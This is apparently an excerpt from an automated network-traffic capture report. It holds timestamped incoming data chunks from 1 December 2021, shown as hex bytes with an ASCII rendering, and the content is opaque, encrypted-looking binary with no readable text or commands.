9b fd c1 d1 ff c9 de eb a6 7b b8 55 dd 74 ac a5 ae 92 58 2b 5c d6 11 6b 3e 6d 36 7e 04 6f 58 05 4a 8a 2f c8 cb b2 12 51 d7 05 a7 ec 21 10 2f 2d ac e9 e8 c8 4a f7 5c 94 a7 e5 89 ae 77 21 9c b4 ba ae 80 10 f8 c7 cb 35 f6 Data Ascii: {OXeC~o&&!75'x 36Fku/~3n/T?CZ9V+Ir1pqXrcO#u$,-4BX+dKBp{lyS=W}X\lqa{UtX+\k>m6~oXJ/Q!/-J\w!5
2021-12-01 15:23:21 UTC	658	IN	Data Raw: 82 3b 13 61 3d 81 bc aa 9c e0 7a f6 c6 ef ad 8e 69 74 fc 47 f6 9b f1 28 07 7e 13 88 28 9a 5b b8 f0 2b 93 d5 69 e2 60 cf e7 0e 90 5e dd 86 3c 97 35 ba cd 0a e5 96 94 5d 9d e7 f2 6a 84 39 f7 4a f6 c2 b2 62 cc fb af c5 48 7c 83 e0 1f aa 9c 77 77 ea 5c 9a 48 97 5b 34 5e 45 8d 2b d1 72 e8 2c b6 46 d4 89 e9 a2 69 ea 0d 76 94 58 a8 6c e4 92 2f c0 a4 65 8b 41 07 68 ff 5f d3 71 64 c5 4a 7b 01 bc bd cc 3f ac 99 dd 9f f4 c8 f9 cf e4 36 6f f4 00 c5 54 be 23 25 ba 5f b3 47 5c b8 bb 34 d8 81 b7 e6 06 65 d8 fc 43 1c 3d 29 cb be 99 01 09 79 90 c1 3c 6c 6d 54 3a 7f 9a 44 94 a0 93 9c 8a 6e f5 d2 38 97 d1 6d 77 0a 75 93 c4 d7 6c 1b 37 70 e8 c5 a0 02 c6 db 8d bb bc 52 a5 03 8c 6d 27 c3 5e d1 ef c2 79 46 91 45 86 2f c4 ce fb 07 7d 6f 24 91 97 cd 42 0a dd 89 3b 78 9d fd cb 42 Data Ascii: ;a=zitG(~([+i`^<5]j9JbH|ww\H[4^E+r,FivXl/eAh_qdJ{?6oT#%_G\4eC=)y<lmT:Dn8mwul7pRm'^yFE/}o$B;xB
2021-12-01 15:23:21 UTC	659	IN	Data Raw: 9c ed bf 2a 43 1d b6 80 97 c9 48 86 2a 55 e3 11 0d 24 2b d2 f6 1d 1f f9 d4 e1 04 2e 4d c0 bf ab 4f 03 6e f5 db 62 3e 15 75 d6 eb b2 3e 52 53 a6 f9 a0 77 9c 76 f9 4a d6 ad 04 e2 0b 96 a1 3d 75 03 73 79 9c 7d c2 fd 80 07 75 5b 51 b0 17 c0 aa 87 bf df 07 ed ca d7 67 50 5d a7 ac c1 29 d4 e9 7e 1c ad 4a c9 51 39 e1 73 f2 c0 28 de 04 1f 2f 44 ec 27 b0 90 a2 90 aa a9 9b f3 a0 f6 62 ca f7 e5 64 da e3 12 76 e6 93 b9 ef bf cd d1 34 a2 59 ef af e4 1e 3b 10 51 97 81 b9 34 ff ac 1e 47 0f 0f f1 b8 93 e4 90 d9 5c c8 dd 80 f4 cb 7e 89 e9 4c ea 6f c9 50 7a 72 11 12 5d df df 75 8f c6 d4 1a a5 d3 b4 b5 3a 74 e3 63 c6 4b 20 35 f9 d4 17 44 00 51 62 cb 42 90 2c 8c 56 ad 1f c7 3b 0c f5 c4 33 8e 56 d9 6f 69 ee f3 be 3f 88 3f 73 ea 44 2a 57 34 05 4d 0e 11 8d 31 7b 81 3b da f0 bd Data Ascii: *CH*U$+.MOnb>u>RSwvJ=usy}u[QgP])~JQ9s(/D'bdv4Y;Q4G\~LoPzr]u:tcK 5DQbB,V;3Voi??sD*W4M1{;
2021-12-01 15:23:21 UTC	661	IN	Data Raw: 0e 80 b9 f7 66 61 84 a0 12 f8 21 e0 d1 74 70 69 38 91 b4 b8 ca 30 21 f6 bf b2 9f 3c 79 f5 53 64 55 7a e6 5b 19 52 4f 98 3d fb 5e b3 39 c5 bd 7d 48 4a b6 a5 dd 87 d2 3d ef 2a eb c3 dc 32 e8 87 59 67 32 3c 9f 3c e7 ed 3a c6 b9 f7 a7 db 3c a2 13 74 9b 24 60 45 ae 27 93 e9 bb 95 54 eb 4f b8 b6 ee 20 dc b0 2a 88 d2 76 9b c8 d4 15 0f fd b1 7d 83 e2 21 04 cf 32 5a ba 41 56 00 fc d9 34 5e ea a9 49 9b 1d 10 94 b6 6d 3c f9 50 48 51 15 3d 47 aa e2 27 52 53 5b 44 6d b4 41 14 c5 b0 e7 55 f4 20 67 9e 02 4f 77 75 98 f6 15 18 ff d3 22 c4 66 af 32 2e 43 c6 20 ac 03 52 51 f8 ae 57 61 d1 9b ac af 04 af 0a 58 74 c7 a5 bf 22 11 4c bb 39 18 7e f2 8e ad aa df ca 25 9a 4e 2e f7 a5 4a 8d d6 33 c8 06 65 bd b9 19 72 52 0e 83 b7 57 2e 64 9a d4 79 04 69 85 54 47 80 46 7d ed 8c 40 96 Data Ascii: fa!tpi80!<ySdUz[RO=^9}HJ=*2Yg2<<:<t$`E'TO *v}!2ZAV4^Im<PHQ=G'RS[DmAU gOwu"f2.C RQWaXt"L9~%N.J3erRW.dyiTGF}@
2021-12-01 15:23:21 UTC	662	IN	Data Raw: 09 71 d5 59 e8 4a ca 56 b6 5a 4e 34 cf 43 8d 31 8e dd 13 dd 1a 8a 2b 5f c1 52 2f 48 93 49 94 1e 27 a4 61 a9 8f 40 4f 2b d1 79 71 0f 0a a2 62 d7 6f 63 70 7f ca 24 21 b6 b6 f4 07 ac 97 ce 6e e6 93 ef 4f a6 6f ad f4 82 f6 57 6a 6b 83 c7 b6 44 d4 b8 96 45 13 6b 49 d8 77 9c 79 02 c0 b6 fb 88 c2 23 27 ec cf 48 10 6a 33 fc 0d d4 b2 5e cc 2b bc ee 17 b7 9e 8d 38 01 c2 98 53 30 46 89 56 5d fd ff 02 f7 df 91 d4 06 7f 1d ba b7 3c 6b 8e 92 cc 50 a0 77 9c 76 6e f5 9e 70 e4 82 51 2c 2d 0a ae 8d a9 95 80 90 88 36 e2 09 7f 19 f8 47 13 95 42 82 a9 99 5d cf 75 06 83 aa 81 ba 2c 6e ee c2 d9 61 48 99 59 45 14 1e 25 e9 90 32 59 2f 60 4f 81 45 12 1a 02 78 39 f0 21 b6 21 51 2a c9 95 d3 b2 95 56 24 23 a8 90 46 7e e6 9d aa db 82 32 55 5f 22 54 bb 34 8b a2 fb 97 c4 d4 eb b4 4e 38 Data Ascii: qYJVZN4C1+_R/HI'a@O+yqbocp$!nOoWjkDEkIwy#'Hj3^+8S0FV]<kPwvnpQ,-6GB]u,naHYE%2Y/`OEx9!!Q*V$#F~2U_"T4N8
2021-12-01 15:23:21 UTC	663	IN	Data Raw: 33 c0 1e 18 16 04 fd ca 1d b0 3d d0 7c 1c 38 70 30 af ba de 11 89 a5 f9 05 80 93 8a 6b 6a f6 4a 26 5b 80 1c 0d f2 9e 94 48 8a 2f cb 47 1e d5 9d 0a 15 bf 71 e9 c4 3b 80 6e 36 59 bc 54 24 65 cb ce ef 52 49 f7 49 de 0f 05 56 d7 74 ee 32 dc b1 02 6c e6 ea ef 68 70 74 fb d0 e0 1d 21 9e ac 49 12 7a 85 84 0c 22 4a 77 84 a3 75 87 2b 20 34 ce e8 24 7c 0f 94 8e a5 77 61 50 5f c5 c9 56 b3 10 19 65 54 8c ba 36 9b 35 85 42 92 a5 97 7b f0 21 b6 21 39 e9 aa 9c 7d 8f 58 b4 13 a0 e9 d8 ed 22 e5 97 29 eb ab 18 16 12 10 80 91 d6 f0 2c 56 71 73 94 d1 e9 6c 06 f0 2e b2 e1 82 27 a6 6c 1a f4 3e 87 30 d0 2f 24 31 cb b0 b0 8f d8 e3 8d 54 4c b8 46 67 f0 44 60 3a 1b 59 7e 24 e8 d7 e6 40 9a df 57 3c f6 75 4f 2f ca cf 7d 5d c4 43 87 c7 57 24 32 dc 2e b4 58 a9 0b 7f 5c 78 81 d3 9e 65 Data Ascii: 3=|8p0kjJ&[H/Gq;n6YT$eRIIVt2lhpt!Iz"Jwu+ 4$|waP_VeT65B{!!9}X"),Vqsl.'l>0/$1TLFgD`:Y~$@W<uO/}]CW$2.X\xe
2021-12-01 15:23:21 UTC	667	IN	Data Raw: e5 8b 2d 8c 1c 34 5f 5b d3 8e cc 46 ff df 1d 35 8b a3 e1 95 58 f1 ad 10 1d bc 1a 6e f2 aa 0f 85 bb 32 d6 22 3b e1 4f 23 3c e4 a9 fe 45 1d c6 c4 4b 9c cf 98 43 1d 21 53 41 a4 93 38 79 03 f5 db 90 43 8a 79 4e a5 e3 8a dc c5 45 85 33 8a d2 35 1c c2 29 a0 2e 67 4e a3 79 a6 8c 95 25 ed 64 1b 30 d5 b7 27 b9 3f 59 d8 f2 fd 48 31 95 be af 0f 9b 2d 22 e6 d5 fe dd 4e bb 22 3e 80 e6 fa 11 f1 cb 40 63 d2 9d ef 3c 37 3b ff c4 d3 83 5d 1c 3a 5c d2 ee be 33 0b 68 fb cd de 9d 28 4c 86 34 8d a4 63 4b 08 1d 44 0a bb 6b 7c 15 88 df 72 19 cb c9 69 7e 04 6f 58 4a 1b 21 5d 58 a3 ee ce 0b 1d 76 2e 41 03 e8 08 f0 d7 81 4c 1c 42 76 70 2e f5 51 ae 96 4d 05 71 9d 00 5b 04 f6 5c d8 e8 48 cf 10 1c 32 c8 57 ea 2b cc c5 91 3f 68 ae 97 cf 78 11 6e 09 91 90 ce 96 4e b2 0f 0d 6f 6f 61 56 Data Ascii: -4_[F5Xn2";O#<EKC!SA8yCyNE35).gNy%d0'?YH1-"N">@c<7;]:\3h(L4cKDk|ri~oXJ!]Xv.ALBvp.QMq[\H2W+?hxnNooaV
2021-12-01 15:23:21 UTC	671	IN	Data Raw: 20 05 8e a9 55 61 6a fd cf ec be bc 7e 04 1e c2 a9 02 9c 7d 87 51 08 bd 44 81 ba 24 f2 2d 42 f7 3e ab 8d 72 6f 6f 97 07 9a 8c b2 2a a0 b6 52 40 11 42 af 1c 25 9e 80 0a f0 25 3f 8b bd e6 9d ea b4 76 09 90 a5 a2 29 eb ac 95 5c e9 a8 62 2e a4 0c 8c d1 f9 9a da a7 f7 20 8a 1e cd b7 bd f8 46 04 68 fd 4b 8c 26 a0 fa 58 2e da e6 c6 c6 5e 57 25 46 2a 2d 2f 00 a9 99 b0 33 25 33 2c 56 7a 7f 06 e1 9d e0 99 28 5d 15 38 21 a3 ef 39 70 06 09 92 ad 56 1f 89 ac 9d 19 1a e1 c8 3c 8e 61 a0 1f ad 14 84 bc a2 ff ae 23 2d 07 9b f8 c1 90 52 6c ec a8 40 70 67 b4 a9 97 d3 9f 53 cb 98 a5 78 c2 7f 81 0a 6d a9 f6 a5 af 69 15 8e 59 bb 26 cd d6 74 fa f1 36 68 0c 62 a7 ff 7b 77 4c cd b3 92 3b 1b 4d 97 8c c3 37 07 87 ac 96 a2 50 d3 83 d2 41 0a b2 7b 1a 4c 1c 75 33 df 93 d6 10 e6 fb 7e Data Ascii: Uaj~}QD$-B>roo*R@B%%?v)\b. FhK&X.^W%F*-/3%3,Vz(]8!9pV<a#-Rl@pgSxmiY&t6hb{wL;M7PA{Lu3~
2021-12-01 15:23:21 UTC	675	IN	Data Raw: 0f 1f 93 de 13 87 b8 67 d5 92 01 7f c8 98 41 1d 70 e5 41 05 ed 38 c9 53 37 f5 39 0f d4 a0 59 25 a5 72 d1 f4 cf 22 91 d7 6d 75 63 d1 f8 e5 80 0f 83 57 c9 04 61 67 44 94 c8 ef b5 28 56 b2 4f 23 3d 7b bd 2d d5 6f 9c 96 06 cf 23 b6 b6 37 6c e6 0e 18 09 bc b2 14 9f 7c f4 ad 5f 4a a2 68 f8 c5 0f 8e 5a a2 6b 87 c5 c1 09 6d 7f 81 89 63 42 7f 18 9f e4 08 e2 09 20 3d 81 ba b4 79 83 6f 6f fe d5 6f 63 53 37 17 07 e3 95 d3 68 f8 a8 6e 9d 04 f9 d2 f0 b2 ef 24 ee 3e b2 87 22 7f 86 3c 75 98 b4 30 d0 5d 41 05 70 08 1d cb c6 d3 73 66 00 da 20 33 59 a4 7a 15 80 1d 4b 89 f1 41 09 6f 60 3d 0b 28 f9 df 8e 51 f5 c1 9f f0 ba 2a 46 9e 67 40 84 a3 63 e5 99 c6 df 70 16 43 e7 9d ff c4 18 01 8b a3 7d d0 e3 8f d8 e7 71 e0 8f 3b ea 27 af f7 25 e2 13 92 58 b5 bb 44 7a de 11 5c d9 f4 cd Data Ascii: gApA8S79Y%r"mucWagD(VO#={-o#7l|_JhZkmcB =yooocS7hn$>"<u0]Apsf 3YzKAo`=(Q*Fg@cpC}q;'%XDz\
2021-12-01 15:23:21 UTC	679	IN	Data Raw: e1 8c db 68 8b c4 c5 50 b7 bd 45 b5 ba 25 a4 f3 38 14 1d bc a9 fd ce 96 d2 fd 0a 26 a1 13 64 bd 9c 58 a0 7f 01 2c 43 8b 6d 60 7e 1f ad 1d 66 2b 22 5d c4 d4 f7 d6 f8 57 2f c2 c0 5d 3a 76 15 97 cf 87 37 8d 56 c6 29 ea af 09 7f 83 be a1 e8 3c 62 2f f6 5c d2 e8 31 29 4a cd a9 72 89 98 a6 f0 61 c6 ac 07 6a fb c9 b4 2e 92 4d 90 38 e1 9f fa 4c 88 e9 ab 23 b1 00 cd 51 dd 0b 29 21 9a f2 10 d1 6a e3 8c 24 c8 56 2c 80 00 cf 63 b8 64 57 bb ed b3 0e 0c 96 85 e9 b3 1b 75 84 f3 a5 42 9b f9 1b b0 8b a5 e2 c5 49 fc 38 d0 66 d9 64 58 9d 00 5e 4e 23 a4 6b 73 fd ff 1a 1c 85 85 48 0b 29 2e 2d 73 59 a0 fb ac 10 91 b2 0d f4 3c f6 de 2f 59 aa e6 9c f3 dc 85 38 0c 6e 60 a7 d6 3c 60 c8 cb df f8 99 55 b1 23 11 a5 0c 64 48 d2 6f e7 e0 8e d5 3d 7e 99 ed 2f 4e ec a6 f4 7e 90 cf 5a 37 Data Ascii: hPE%8&dX,Cm`~f+"]W/]:v7V)<b/\1)Jraj.M8L#Q)!j$V,cdWuBI8fdX^N#ksH).-sY</Y8n`<`U#dHo=~/N~Z7
2021-12-01 15:23:21 UTC	683	IN	Data Raw: 7e 87 f0 b2 0f ef 33 49 7f 13 0c aa 06 71 10 8f 4a c8 08 6d fa 1e ba a3 fc d4 9f ed bd 2c c1 d5 71 fe 49 14 c4 70 fa 6b 83 b6 21 6f 72 7e 99 8b 57 ff c5 97 cb b1 8b 27 41 fc 74 a3 73 65 44 03 ed f5 24 b3 e4 6a 1c 73 38 f4 58 a9 9c f0 30 5f 5c c5 9e 73 f5 56 ce 19 7a 5b 57 a7 e3 8d 3a 97 a5 00 80 bf a1 e0 02 37 00 50 3c 74 6e 39 ee b9 b8 f0 ce 3e 7e ce ec ce 6c 01 b8 46 e0 3c fd d3 75 07 ed cb a2 fa dc 23 58 e8 cb d9 67 46 03 e0 03 7f 87 b7 f1 bb b7 d8 82 cc 38 49 3e ea 21 aa 0e 93 ea ca 86 82 a6 66 c5 cd 2f 65 48 bc ad 85 b1 1d a3 ec ce 73 29 26 1d 3f e9 a3 38 c9 d0 07 63 b5 ae 5a be 30 df 9a 55 2a 57 f3 ae 6b 91 90 de 8c 2c 44 16 8b b5 cb 34 58 3f e6 05 ed da f7 c6 ef bf bc b4 a7 fc 47 fa a5 7c 74 15 ec fa 72 5c ad 07 c3 e8 2f 4a 65 fa ac 03 3d 66 b4 3c Data Ascii: ~3IqJm,qIpk!or~W'AtseD$js8X0_\sVz[W:7P<tn9>~lF<u#XgF8I>!f/eHs)&?8cZ0U*Wk,D4X?G|tr\/Je=f<
2021-12-01 15:23:21 UTC	688	IN	Data Raw: 68 6f 59 c8 7c 34 90 b5 20 24 31 5e 4f 4b 06 f4 5a 6d e9 21 6f 14 10 17 97 25 2a db 94 ab 26 91 c7 49 0e e7 43 9a 20 e5 ae 8e 59 26 1c 11 05 67 40 fa 33 ce 6f 07 aa 27 27 d1 a2 99 13 6c e9 b3 1b 27 f7 a7 ee 29 de ee d4 a8 02 f5 d9 6e 6c 95 c3 c1 62 c4 4c d9 73 7b 8b 32 c9 56 5f c4 48 f2 29 de 12 f5 2d 56 f6 2e 46 8c 2c b1 fa 68 e5 82 32 55 5f 44 9c 70 f0 ba da 0e a6 51 8f b3 fd 52 5d 21 63 dd 19 5d 14 11 9a 59 bd aa ef 2c dd db 0f 09 69 e7 0e 12 da 7f 0f 9b 0f 1b 20 46 9a 5f 5b a5 8b 24 67 b7 37 49 12 7a 9e 0f 26 2f 69 79 fe ce b5 87 b1 fc 59 eb 28 d4 9a 05 80 de 18 1c f2 c2 d2 f3 a7 76 86 7d 82 3b ef 55 bc 57 2b 28 ab 6d 70 72 e8 22 be 93 30 d9 08 34 c3 d7 27 7f 56 6a 1b ac 96 48 1c a5 9e 78 14 1d 4a 71 58 f8 43 15 94 d6 89 a5 7f ba 7a 11 62 3d 5f 3e 9f Data Ascii: hoY|4 $1^OKZm!o%*&IC Y&g@3o''l')nlbLs{2V_H)-V.F,h2U_DpQR]!c]Y,i F_[$g7Iz&/iyY(v};UW+(mpr"04'VjHxJqXCzb=_>
2021-12-01 15:23:21 UTC	692	IN	Data Raw: d5 8d 38 e8 26 c5 12 e5 96 50 bc 3a 44 73 9e 92 bd bb 61 b5 08 40 85 bf e4 8f 4b 76 28 e4 f9 2a c9 00 5f 1d 04 e1 81 a5 1e c0 78 10 1e 34 48 02 6c 85 b5 39 f4 9e 71 87 d5 e2 74 e5 88 31 cb 35 5d 99 d9 64 50 58 ab d4 49 ff f5 5d 2f ce f9 d7 6e d0 0e db 8c 20 93 b0 86 05 64 36 e0 9e 02 f0 3a 6b 8f 21 ee ad ec 36 79 01 d9 10 1f b6 b7 cb d0 7a 52 3c 3c 2b d4 e2 15 43 09 7a 08 eb 4b 65 c0 19 f1 a7 e4 00 c4 49 f0 6e 94 5c 1b b0 95 56 4b 49 fa 23 07 a2 7c 15 17 f8 fe c2 e7 58 42 0d e9 ad f7 4c 0e 60 2f f3 f2 e2 00 d8 7c 6f 6e 75 a3 20 31 32 b2 1b cb b8 de ef 3e 99 88 ee 30 bb 55 a7 13 9f eb 2d 47 5f bb a1 7d f5 cf 66 c5 a8 dc 6b b1 02 ff 54 38 68 6c af 77 88 2e 4b f7 25 e0 4a 78 1b a7 70 61 36 9c e9 ff 85 8c d4 ea 3a e9 d2 16 95 40 64 47 19 97 5a 29 d7 72 e3 11 Data Ascii: 8&P:Dsa@Kv(*_x4Hl9qt15]dPXI]/n d6:k!6yzR<<+CzKeIn\VKI#|XBL`/|onu 12>0U-G_}fkT8hlw.K%Jxpa6:@dGZ)r
2021-12-01 15:23:21 UTC	696	IN	Data Raw: 43 4f bf 90 de 2d 35 f1 f5 17 fa 6e 3c 1a df cb f8 b1 e3 8b 73 fe f2 ec 8d 85 41 3b 2f 3a 83 ba d5 fa 82 5c 97 05 9a b4 70 58 56 bd 8f 2a 67 3f c7 ea e1 ed 26 c0 f5 e7 e9 43 df 20 0a db cc 96 57 79 12 71 7d 39 2d e9 5c e6 99 92 22 2a 52 88 44 d2 75 35 e1 03 27 43 b9 f5 fd f8 6d 35 7e 7e 89 db 8c a8 14 02 6e c6 4c 98 66 38 40 4e ec 7a b3 57 04 19 51 71 7e de b9 e5 b5 6e a4 38 bf 7f 12 f0 0e a6 84 8c 3a 0a d4 57 d2 c4 cd 73 41 4e 4d 29 14 ab 0e cd b8 5a 53 50 df 49 84 f2 ed 4f c0 92 11 3c 3b f2 f6 57 1b f7 78 ee 39 2c bf c5 e8 40 c8 8e 57 49 1c 0c 05 88 ff 9a c7 34 7b 5c f4 60 20 e3 77 64 11 f4 30 ab 2c b1 90 c8 41 f8 13 95 33 10 c3 7e b3 1a 54 63 10 f6 60 75 7a 02 9f 0e bb 39 60 81 b4 50 a4 c1 67 d7 69 36 c9 d9 4e 00 2e 71 f0 ae 24 eb 80 42 41 4d b3 28 c3 Data Ascii: CO-5n<sA;/:\pXV*g?&C Wyq}9-\"*RDu5'Cm5~~nLf8@NzWQq~n8:WsANM)ZSPIO<;Wx9,@WI4{\` wd0,A3~Tc`uz9`Pgi6N.q$BAM(
2021-12-01 15:23:21 UTC	700	IN	Data Raw: 74 1c 10 c9 b4 8e 77 e1 04 db 93 88 f2 57 8c 4d ef 66 31 d7 51 1a 83 8e 13 36 10 9d bd a9 52 a9 94 c4 e2 2e 3d 6b d2 5e 08 4a a4 c4 aa 71 f6 cd 68 af 1c f2 38 cd 51 1f fe e6 5c 1b ad 69 ba 74 66 75 11 11 9b 42 34 30 8c 95 a1 4c a5 18 88 e6 11 59 b3 0e c3 55 3a ac e1 53 8a e8 c1 b9 fd 01 d0 ba 5f 84 96 d6 cb 7b fb d9 51 e2 78 d9 61 90 c4 8d 91 b7 34 6b 3b ea 9c c6 13 0a e5 d9 31 e1 ec 98 61 27 3d 9e d5 7d a8 a7 ff 75 f7 04 a5 b8 f9 30 fc a0 02 ce c9 eb d4 93 c0 aa 01 04 18 cc 91 6f f5 5d 4e 4a 5c 4c 4d 13 0e b9 25 6f ba b4 68 6b eb 64 96 dc 50 2b d9 a1 ad 23 81 b3 1f 88 dd 68 52 35 5d 14 94 e2 43 29 9b 4a ab 4e 40 d4 7b dd 67 b0 09 de 29 d4 4b 7e 87 41 2f 44 ba 33 46 28 c3 b1 69 82 40 16 fa 86 65 a6 12 ae 1b 9a 05 f7 b1 8f e9 31 52 1d 69 67 3b 4f f0 c5 4b Data Ascii: twWMf1Q6R.=k^Jqh8Q\itfuB40LYU:S_{Qxa4k;1a'=}u0o]NJ\LM%ohkdP+#hR5]C)JN@{g)K~A/D3F(i@e1Rig;OK
2021-12-01 15:23:21 UTC	704	IN	Data Raw: 17 00 86 ff 5c 5e a3 71 ec 32 c1 ce 57 2d dc 02 6f fe e6 18 00 c2 35 cc 43 74 4b a3 47 16 66 4e bd da 61 b4 4c b2 04 bf da 28 87 7a 74 7c 4e 7a ca 1c c5 3d 60 a5 6e 32 82 ff af 8e 1a dd 54 61 53 77 b3 a6 6c ee be 73 66 4d 80 19 1c 5d 2c 4a 8b a1 74 8b b5 a3 d1 84 22 2a 57 34 96 fe 87 be 7b 89 63 5a 7f 81 29 29 9d 0a 17 c3 fe a4 61 48 10 79 69 e1 12 fa 55 21 b5 a6 5f 5d c2 c0 b0 90 5c 48 0a e0 9d 47 12 cf 98 d6 c0 0f 92 46 90 5e 58 01 59 2f df 8c e4 18 ba 20 90 5c 05 70 95 d8 8a 2a 5e d3 74 e7 1e 0a e7 7f 1a 83 be 6d c9 d8 70 a5 0b ca d8 1d 29 4d ba aa 97 ce 02 c2 89 08 e9 ba 29 45 fe d6 76 e6 17 92 52 7c 17 48 81 68 f8 97 cb 89 b2 4f d8 06 0a 78 ea 48 74 77 70 d8 88 ac bc a7 fa 56 a5 96 e2 e5 95 d4 7d f5 4a bd 86 ab 60 c6 4a d2 f3 a3 e4 d2 f6 9a 4e 36 8d Data Ascii: \^q2W-o5CtKGfNaL(zt|Nz=`n2TaSwlsfM],Jt"*W4{cZ))aHyiU!_]\HGF^XY/ \p*^tmp)M)EvR|HhOxHtwpV}J`JN6
2021-12-01 15:23:21 UTC	707	IN	Data Raw: 98 40 83 a5 e8 20 f2 3b 79 5c da f6 d3 b8 50 ff 32 dd 93 f0 3a 67 55 f1 b9 a7 13 81 a5 7b 7b 39 bf 8d 26 2b b8 a3 f4 5e 14 0c 72 10 02 e8 a1 16 a3 ae 2a df 93 3b ed a3 fc 9f 06 68 1e 40 04 fd 5e 48 0e 2a 36 64 26 aa 04 6d 17 c9 a2 eb b7 da ff c7 42 40 79 10 c4 21 b3 d6 eb 24 da f1 a7 7c f4 b7 91 6d f0 6e fb 54 9c 7e 05 7b f5 4f c3 54 ac 00 0a 03 6f e1 7a 06 76 db 85 6c 55 a1 6f 71 84 f8 e2 cd 8b 5f a6 19 6b a0 7f 98 d6 df 7e 94 24 f5 3e e0 8c 22 d0 0d 13 13 46 91 d0 62 a6 7d 78 eb 50 2e 04 04 ca 03 7d 1a 83 f5 3b 74 72 fd 59 d8 03 9c 13 1b c9 e2 08 e8 3a e9 4f 77 d4 5b 81 a3 e6 df 8e c5 b5 7d 79 16 98 5a 43 5b e7 5d 5c de d6 f2 b7 b2 69 94 c8 4c 97 38 43 9c 76 5a e6 fa 86 3c 7c 82 c2 db 69 a9 73 ed a3 53 36 81 d2 78 08 fd ca cf 72 90 11 5d 5f 5a 24 44 30 Data Ascii: @ ;y\P2:gU{{9&+^r*;h@^H*6d&mB@y!$|mnT~{OTozvlUoq_k~$>"Fb}xP.};trY:Ow[}yZC[]\iL8CvZ<|isS6xr]_Z$D0
2021-12-01 15:23:21 UTC	711	IN	Data Raw: c4 95 3a 1f 9a c5 66 34 8b c2 b4 32 b8 4b e0 8a 57 b1 4c 72 75 1e 3f 6a 1d 56 58 2a d1 35 01 b8 24 0d af 14 1e 25 5d bf 42 0d 28 cc 06 20 e2 61 cc b2 42 5b 97 1d 88 ae 87 3c ae 4a 53 5f d9 65 9d 71 ae 43 2c d4 f1 6c 3f 34 47 58 b4 b9 36 78 89 0f 0f f6 48 14 1e ec 23 3c ee 28 bc af 79 7c 97 b0 7d eb 12 23 56 2c 21 58 cb 0f d0 24 d7 fd 8d 3a 32 a2 91 22 a8 44 8b 50 33 42 d6 17 38 38 90 cf 9e 6b 38 d9 78 0f 90 cb c0 b6 29 0f 83 45 e3 f1 db ba bd 36 e0 f3 4c 6b 90 a2 f6 c8 30 b0 74 71 f2 24 66 5c ff c3 5f c4 de 87 8d 0d fb c3 55 bd 58 a0 7f 9e e6 81 b7 87 6c 1f 2b 43 5f c6 31 24 bb a3 0d 7f f1 2c ad 55 b4 42 3e 62 a8 8c 62 53 b9 2b 56 54 f4 ce 15 95 70 11 78 c9 ca 89 b5 a4 f1 ac 03 8f d4 74 e6 95 54 2e 44 88 17 70 11 db ef f6 55 2b 4b 6a e5 1e 01 9b e1 0a 66 Data Ascii: :f42KWLru?jVX*5$%]B( aB[<JS_eqC,l?4GX6xH#<(y|}#V,!X$:2"DP3B88k8x)E6Lk0tq$f\_UXl+C_1$,UB>bbS+VTpxtT.DpU+Kjf
2021-12-01 15:23:21 UTC	715	IN	Data Raw: 70 00 41 e2 07 aa 37 73 7b 5a 4d 94 b0 9f b5 27 18 7c 9a cc 66 df 17 92 dd 09 d1 79 9d e3 8d 39 68 f7 6b 10 c8 cb d3 96 a4 f7 3d f7 69 13 47 11 6b e6 ed 41 84 91 c5 44 da 18 16 32 bd 6a ef 33 3a 69 80 97 44 70 f3 c7 af 1d f0 d5 52 90 44 94 55 bc 29 c5 41 2c c2 df 0e 90 45 a7 5f ce 91 c4 4a 03 78 a1 d1 ba 99 53 57 c7 ac 7d 18 42 75 f4 23 9b a1 f2 9c 83 03 2c 74 18 96 0b f7 5b 47 83 80 dc f6 6f f4 a4 7d 8f 19 21 a9 ce fa de a3 5e 5e 79 87 54 3e 60 d6 31 dc a4 5a 41 72 75 1c 38 dd 9c 4d fd fd f4 db 22 67 bf b0 c4 59 a3 f7 47 26 fa bc 96 cf 85 a7 e3 46 25 a1 39 fd 58 49 a6 e4 bf 24 d0 70 e9 b3 c6 c2 67 71 92 38 e7 08 ff 2b 36 16 4d d6 33 ae 3c 78 e2 81 fb 56 3f e5 1d d2 21 5c ef 2d 24 2f c8 00 7d 89 7f 82 a9 ac 2a c4 6c f6 bd ab 0c e3 58 aa 3f d0 08 86 b5 e4 Data Ascii: pA7s{ZM'|fy9hk=iGkAD2j3:iDpRDU)A,E_JxSW}Bu#,t[Go}!^^yT>`1ZAru8M"gYG&F%9XI$pgq8+6M3<xV?!\-$/}*lX?
2021-12-01 15:23:21 UTC	720	IN	Data Raw: 27 ce e4 0a e1 78 73 62 23 b0 b4 b0 93 d5 62 29 31 55 62 37 cd 12 41 78 b2 35 a7 35 dc 92 54 7a b8 22 18 ab f6 cb 0d 80 92 81 bf a0 7e d9 e7 19 3a 74 3f 50 42 0c 11 82 cb c3 8b b9 aa 0e 0f 7a f6 1d 50 fd c5 46 1d 3e 78 e5 62 88 c7 5a a5 e2 b4 89 35 9e 74 58 bb fd ce 41 85 04 55 37 25 a3 6f 99 c6 1a 90 b0 9b 30 d1 9b 0a 1b 80 02 f3 b0 8a dc e7 b2 36 10 ef 50 8e e7 74 b5 77 64 94 e4 7f ff f4 1a fc d8 a6 f2 df 82 e4 93 59 3d 62 45 1b 73 f5 76 02 4c e5 05 fa 4f ff 65 48 56 44 d9 78 85 3a 70 57 f1 3b 5e 69 67 96 58 35 e7 9a 8c b5 3b 05 1d a5 d2 26 b6 a1 1f dd 7c 0d 9e 83 68 32 1e 29 4e 59 b8 ca 59 a9 19 3a 4f 97 d0 21 bb b3 d6 49 0e ae 09 d8 fb c9 90 5e 76 f9 43 98 4d ec d7 27 fa 45 11 9b 71 53 23 5b 36 84 9c 00 f2 60 4d 9a d1 8c ba c7 c4 54 a6 c0 9a 91 69 74 Data Ascii: 'xsb#b)1Ub7Ax55Tz"~:t?PBzPF>xbZ5tXAU7%o06PtwdY=bEsvLOeHVDx:pW;^igX5;&|h2)NYY:O!I^vCM'EqS#[6`MTit
